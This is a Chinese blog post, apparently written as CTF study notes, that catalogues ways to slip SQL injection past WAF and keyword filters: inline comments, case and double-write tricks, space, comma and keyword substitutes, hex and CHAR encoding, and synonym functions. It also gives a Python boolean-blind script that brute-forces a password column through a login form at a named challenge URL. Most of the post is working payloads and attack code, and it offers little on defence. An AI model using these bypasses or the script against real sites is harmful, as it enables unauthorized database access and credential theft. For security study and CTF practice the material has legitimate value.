二、sql绕过过滤

已于 2024-02-28 19:26:30 修改
阅读量1k 收藏 10
点赞数 6
分类专栏: # Web安全 文章标签: sql 数据库
于 2023-11-27 20:06:49 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46765649/article/details/134649520
版权

参考文章:文章

一、sql绕过过滤

解释:sql绕过过滤,通俗来说就是你注入的sql语句里面有一些关键词被WAF过滤掉了,你需要想一些办法进行绕过

1.注释

解释:下面是三种注释方法,常用的是前两种,其中在浏览器中注释一般用--+因为+号会被自动解析为空格

-- 注释内容
# 注释内容
/*注释内容*/

1.1 内联注释

解释:有一种内联注释注入(其只存在于mysql),其相比上面的注入更常用,其是/*注释内容*/的变体,标准格式为/*!代码*/

SELECT * /*!from*/ emails;
上面的语句等价于SELECT * from emails;
SELECT * FROM emails WHERE email_id=5 UNION /*!select*/ 1,2;
上面的语句等价于SELECT * FROM emails WHERE email_id=5 UNION select 1,2;

2.大小写过滤

适用情况:当WAF将如select过滤掉,我们使用SELECT也可能成功绕过WAF的过滤实现注入

3.双写绕过

适用情况:WAF会进行匹配关键词如select,如果匹配成功就进行将关键词删除,我们可以构造selselectect这样这个单词中间的select剩余字母就又拼接成select从而实现注入(这种情况适合条件很苛刻)

4.逗号绕过

适用情况:有的题目不能输入逗号,输入就会过滤

union select 1,2

等价于:union select * from (select 1) a join (select 2) b

4. from绕过

适用情况:输入from之后就会没有返回信息,或者出现其它异常的情况,其就是from处于黑名单,此时要绕过

// 此种方法通常要配合python的暴力破解,下面有脚本(通常还需要配合布尔注入)
select * from user where passwd like 'a%'

import requests


class BoolCrash:
    def __init__(self, url, subject):
        self.subject = subject
        self.url = url
        self.list = list('0123456789abcdefghijklmnopqrstuvwxyz')
        self.empty = ''

    def run(self):
        while True:
            for i in self.list:
                # 下面3行需要自行构造
                sql_payloads = f"1' OR p3ss_w0rd like '{self.empty + i}%' #"
                params = {'username': sql_payloads, 'password': '1'}
                response = requests.post(url=self.url, data=params)
                response = response.text
                # 布尔注入判断的条件
                if self.subject in response:
                    self.empty = self.empty + i
                    break
            # 当下一个内容不再出现在列表里面时,代表下一个内容为其它内容或为空,循环结束
            else:
                print('当前碰撞结束,结果可能因为list内容的局限而失败')
                break
            print(self.empty)

BoolCrash('http://eci-2ze9oa2p12vc9plzmnyh.cloudeci1.ichunqiu.com/Challenges/login.php','密码错误').run()

4.编码绕过

适用情况:对例子一般where name=xxxx对于xxxx可以转换为编码进行绕过

4.1 十六进制编码

SELECT * FROM emails WHERE email_id=0x737475706964406468616b6b616e2e6c6f63616c;
-- 上面表示查询email_id=stupid@dhakkan.local的信息,其中注意,16进制编码需要0x开头
-- 后面跟字符串对应的16进制编码

4.2 ASCII编码

SELECT * FROM emails WHERE email_id=CHAR(115, 116, 117, 112, 105, 100, 64, 100, 104, 97, 107, 107, 97, 110, 46, 108, 111, 99, 97, 108);
-- 上面表示查询email_id=stupid@dhakkan.local的信息
-- 可以用hackbar的SQL MYSQL-CHAR快速编写出类似格式的内容

5.空格绕过

5.1 /**/

SELECT/**/*/**/FROM/**/course;
等价于
SELECT * FROM course;

5.2 ()

-- ()括号内不能写*
-- 括号包裹的内容一般不能是select from where这种关键词
SELECT(Cno)FROM(course);
等价于
SELECT Cno FROM course;

5.3 回车

SELECT
Cno
FROM
course;
-- 通过回车就能实现没有输入空格就实现SQL注入
-- 回车的URL编码%0a(在浏览器栏输入时适用)

5.4 `

-- 注意`是反引号并非'单引号
-- 反引号包裹的内容一般不能是select from where这种关键词
SELECT`Cno`FROM`course`;

5.5 Tab

-- Tab类似于输入空格但其同空格并不相同
-- Tab的URL编码%09(在浏览器栏输入时适用)
SELECT	Cno	FROM	course;

6.同义过滤

1. 普通同义

and 同义 &&
or 同义 ||
xor 同义 |
not 同义 !
= 同义 like regexp rlike
!= 同义 <>
' 同义 十六进制

SELECT Cno FROM course WHERE Cno=1 && Cpno=5;
SELECT Cno FROM course WHERE Cno=1 || Cpno=5;
SELECT Cno FROM course WHERE Cno=1 | Cpno=5;
SELECT Cno FROM course WHERE Cno!=1;
SELECT Cno FROM course WHERE Cno like 1;
SELECT Cno FROM course WHERE Cno<>1;

2. 函数同义

2.1 >或<(greatest、least)
>< 等价于 greatest(n1, n2, n3…) least(n1, n2, n3…)

-- greatest返回参数当中的最大值,这就类似于适用大于小于号的效果
-- least返回参数当中的最小值,这就类似于适用大于小于号的效果
SELECT * FROM course WHERE Cno=9 AND GREATEST(ASCII(SUBSTR(Cname,1,1)),1)=106;
2.2 =(strcmp、between)
= 等价于 strcmp(s1, s2) 
= 等价于 between ... and ...

-- strcmp用来对比s1与s2两个字符串,当s1与s2完全相同时返回0
SELECT * FROM course WHERE Cno=9 AND STRCMP('1','1')=0;
SELECT * FROM course WHERE Cno=9 AND SUBSTR(Cname,1,1) BETWEEN 'j' AND 'j'; -- 查看Cname中第一个字符是不是等于'j'
2.3 逗号
-- 适用于类似substr函数(sql盲注时使用)
SELECT * FROM course WHERE Cno=9 AND SUBSTR(Cname,1,1) BETWEEN 'j' AND 'j';
等价于
SELECT * FROM course WHERE Cno=9 AND SUBSTR(Cname FROM 1 FOR 1) BETWEEN 'j' AND 'j';

-- 适用于并列条件时(联合注入)
SELECT * FROM course WHERE Cno=9 UNION SELECT 1,2,3,4;
等价于
SELECT * FROM course WHERE Cno=9 UNION SELECT * FROM (SELECT 1)a JOIN  (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d;

-- 适用于使用limit时
SELECT * FROM course LIMIT 0,2;
等价于
SELECT * FROM course LIMIT 2 OFFSET 0;

7.函数过滤

解释:指某些函数被过滤之后用同义函数去替代

7.1 sleep()

替代函数:benchmark()

SELECT 1 AND SLEEP(1);

SELECT 1 AND BENCHMARK(1000000000,1);
MySQL有一个内置的BENCHMARK()函数,可以测试某些特定操作的执行速度。 参数可以是需要执行的次数和表达式。第一个参数是执行次数,第二个执行的表达式

7.2 ascii()

替代函数:hex()bin()conv()

替代函数:ord()

SELECT * FROM course WHERE Cno=9 AND ASCII(SUBSTR(Cname,1,1))=106;
等价于
SELECT * FROM course WHERE Cno=9 AND CONV(HEX(SUBSTR(Cname,1,1)),16,10)=106;
-- CONV('FF', 16, 10); 将’FF‘从16进制转换为10进制

SELECT ORD('a'); -- ord 只是在处理中文的时候同ascii有区别
SELECT ASCII('a');

7.3 group_concat()

替代函数:concat_ws()

SELECT GROUP_CONCAT(1,2,3); -- 123
SELECT CONCAT_WS(',',1,2,3); -- 1,2,3

7.4 substr()

替代函数:substring ()mid() left() right()


SELECT SUBSTR('abcdef',1,2); -- ab
SELECT SUBSTRING('abcdef',1,2);-- ab
SELECT MID('abcdef',1,2);-- ab
SELECT LEFT('abcdef',2);-- ab
SELECT RIGHT('abcdef',2);-- ef

8.特殊符号

例子1:

SELECT+Cno-1+1.from course;
等价于
SELECT Cno FROM course;
-- +是用于字符串连接的,‛-‛和‛.‛ 在此也用于连接,可以逃过空格和关键字过滤

9.关键词

select insert update delete
替代此时考虑是否存在堆叠注入
-- 查数据库 show database;
-- 查表 show tables;
-- 查列 show columns from table;
黑日里不灭的light
关注
  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试工具sqlmap基础教程
分享编程技术、项目开发、实用工具。
07-17 25万+
转载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 本文仅献给想学习渗透测试的sqlmap小白,大牛请绕过。 > > 对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。然而,一个没有师傅带领的小白在刚开始学习时,并不知道该如何入手进行渗透学习,所以本文旨在帮助这些小白入门。 sqlmap
sql注入-绕过过滤空格
MichealCurry1的博客
10-09 2744
空格可以用/**/,%20替换
SQL注入绕过技术
最新发布
Kali与编程
12-12 1008
输入过滤是指通过限制用户输入的方式,防止非法或有害的信息进入应用程序的过程。在 Web 应用程序中,防护通常包括限制非法字符、转义特殊字符等方式。在 SQL 注入攻击中,输入过滤旨在防止攻击者直接将SQL语句注入到数据库中。例如,通过检查用户输入以确保其只包含数字或字母,并删除包含特殊字符的输入,可以防止常见的 SQL 注入攻击。常见的输入过滤技术包括正则表达式、白名单过滤、黑名单过滤等。虽然这些技术能够有效地减缓SQL注入攻击,但是它们并不是完美的解决方案,因为攻击者有多种方法可以绕过这些策略。
使用sqlmap绕过过滤
08-05
该文档讲解了如何使用sqlmap绕过过滤手段的方法,有兴趣的可以下载看看
绕过select过滤
mr__sheng的博客
09-08 578
可利用 char() 函数将select的ASCII码转换为select字符串,接着利用concat()函数进行拼接得到select查询语句,从而绕过过滤。或者直接用concat()函数拼接select来绕过
SQL注入绕过select过滤
qq_43596950的博客
03-25 4591
原题目出自攻防世界收录的2019强网杯,官网已有writer up,此博文仅个人的做题笔记 原题目链接:adworld.xctf.org.cn select被过滤可以考虑使用show显示表名和列名 http://ip:port/?inject= ';show databases;show tables;show columns from table; alter更改表名,利用源代码中的select进行查询 alter语句: ALTER TABLE 表名 CHANGE COLUMN 列名 【新】列名
sql注入用<>绕过过滤的select ——百度杯9月第SQL
热门推荐
ancan8807的博客
09-17 1万+
题目提示SQL注入,打开源代码发现<!--SELECT * FROM info WHERE id=1--> 尝试union select 1,2,3提示inj code! 经过多次尝试之后发现select已经被过滤,于是百度绕过select过滤的方法,/*!%53eLEct*/,发现依旧无法绕过select过滤 经过再次尝试后发现可以用<>进行绕过,于是构造...
SQL注入技巧之显注与盲注中过滤逗号绕过详析
09-09
然而,有经验的攻击者能够通过各种技巧绕过这些过滤措施。在过滤逗号的环境下,攻击者可以使用特定的SQL技巧来执行注入攻击,其中联合查询和盲注是两种主要的方式。 1. 联合查询显注绕过逗号 在传统SQL注入中,通常...
绕过过滤SQL注射1
08-08
绕过过滤SQL注射1 在本篇文章中,我们将讨论如何绕过防注入系统,特别是在遇到Access数据库时无法使用的方法。下面是相关的知识点: 1. 查看数据库版本的查询语句:select @@version 在MSSQL中,使用select @@...
深入了解SQL注入绕过waf和过滤机制
02-11
"深入了解SQL注入绕过waf和过滤机制" SQL 注入绕过 WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAF(Web Application Firewall)的常见特征是指其具有审计...
SQL注入绕过实战案例
08-31
本文将深入探讨SQL注入的概念、工作原理,并通过"SQL注入实战案例"来阐述如何进行有效防御和绕过。我们将基于sqli-labs-master靶场进行学习,这是一个专门用于SQL注入攻防演练的平台。 SQL注入(SQL Injection)是...
sqlmap绕过过滤的 tamper 脚本分类汇总
10-19
sqlmap绕过过滤的 tamper 脚本分类汇总,包括所有的数据库的过来脚本汇总
SQL注入绕过的技巧总结
09-09
最后,**比较符绕过** 主要用于分查找时,若 `和 `>` 被过滤。在这种情况下,可以利用`greatest()`函数来代替比较操作。例如,如果`id=1 and ascii(substr(database(),0,1))>64`这样的条件无法执行,可以改写为`id...
过滤绕过
L6y1a
02-04 356
过滤+绕过整理 1.如果空格被过滤,括号没有被过滤,可以用括号绕过–>括号的两端,可以没有多余的空格 ?id=1%27and(sleep(ascii(mid(database()from(1)for(1)))=109))%23 ?id=1’and(sleep(ascii(mid(database()from(1)for(1)))=109))# 没有逗号也没有空格。猜解database()第一个字符ascii码是否为109,若是则加载延时 2.如果引号被注释,就可以通过十六进制绕过 =“users”
sql注入绕过空格过滤
一只菜鸟的博客
10-31 6303
SQL注入时,空格的使用是非常普遍的。比如,我们使用union来取得目标数据: http://www.xxx.com/index.php?id=1 and 0 union select null,null,null 上面的语句,在and两侧、union两侧、select的两侧,都需要空格。 1. 注释绕过空格 这是最基本的方法,在一些自动化SQL注射工具中,使用也十分普遍。在MySQL中,用 /*注释*/ 来标记注释的内容。比如SQL查询: select user() from dual 我们用注释替换空格
快速过滤出完整的SQL语句
weixin_34040079的博客
07-29 68
  [root@bass ca]# mysqlbinlog --short-form mysql-bin.000008 |egrep -v "^(/|SET|BEGIN|COMMITER|#|COMMIT)" &gt;a.log [root@bass ca]# mysqlbinlog --short-form mysql-bin.000008 |egrep -v "(^/|^SET|^BE...
定制SQLmap和WAF绕过
weixin_58954236的博客
09-23 1008
sqli-lab第26关为例输入?id=1’ --+,报错字符型注入考虑闭合问题,输入?id=1’ and '1,但是回显中and和空格消失了,可知and和空格被过滤了因为and和or被过滤考虑使用双写绕过手段,空格使用其他字符进行代替例如%0a或%a0使用SQLmap扫描,结果无SQL注入漏洞可是明明手动测试存在SQL注入漏洞但是SQLmap竟然没有扫描出来,是因为SQLmap在进行注入的时候没有合适的绕过手法,被过滤掉了,那么就需要我们对SQLmap发送的payload进行编码。
sqlmap绕过空格过滤方法
qq_45290991的博客
07-17 4991
sqlmap自带的脚本: --tamper "space2comment.py" 补充: 脚本名:space2comment.py 作用:Replaces space character ' ' with comments /**/ 也就是用注释/**/替换空格字符' ' sqlmap中的tamper脚本有很多,例如:equaltolike.py(作用是用like代替等号)、apostrophemask.py(作用是用utf8代替引号)、greatest.p...
mysql 绕过select报错_Web安全之SQL注入(原理,绕过,防御)
weixin_36193839的博客
02-18 688
首先了解下Mysql表结构mysql内置的information_schema数据库中有三个表非常重要1 schemata:表里包含所有数据库的名字2 tables:表里包含所有数据库的所有的表,默认字段为table_name3 columns:三个列非常重要TABLE_SCHEMA:数据库名TABLE_NAME:表名COLUMN_NAME:字段名SQL注入原理:web应用没有对用户输入的数据进行...
sql 注入有哪些绕过过滤的方法
07-17
2. 使用注释符绕过过滤:攻击者可以使用注释符(--)来注释掉后面的SQL语句,从而绕过过滤。例如:输入“' or 1=1-- ”,其中的"--"可以注释掉后面的语句。 3. 使用空格绕过过滤:应用程序通常会过滤掉一些关键字,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值